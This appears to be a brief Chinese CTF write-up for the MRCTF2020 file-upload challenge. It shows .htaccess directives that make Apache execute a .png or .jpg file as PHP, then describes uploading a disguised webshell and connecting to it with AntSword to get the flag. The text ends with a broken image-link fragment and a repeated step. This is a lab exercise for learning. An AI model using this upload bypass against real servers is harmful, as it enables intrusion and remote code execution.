[MRCTF2020]你传你🐎呢
审题
一眼文件上传
知识点
.htaccess文件的作用
php
<FilesMatch "a.png">
SetHandler application/x-httpd-php
</FilesMatch>
将a.png当做php文件执行
php
AddType application/x-httpd-php .jpg
AddType 是一个 Apache 服务器的指令,用于将指定文件扩展名与指定的 MIME 类型关联起来。
解题
-
上传.htaccess文件,并更改上传类型为image/png
-
上传a.png文件,同样更改上传类型
-
上传成功后转到uploud/.../a.png目录
-
连接蚁剑得到flag
TLXQ-1730462329289)]
- 连接蚁剑得到flag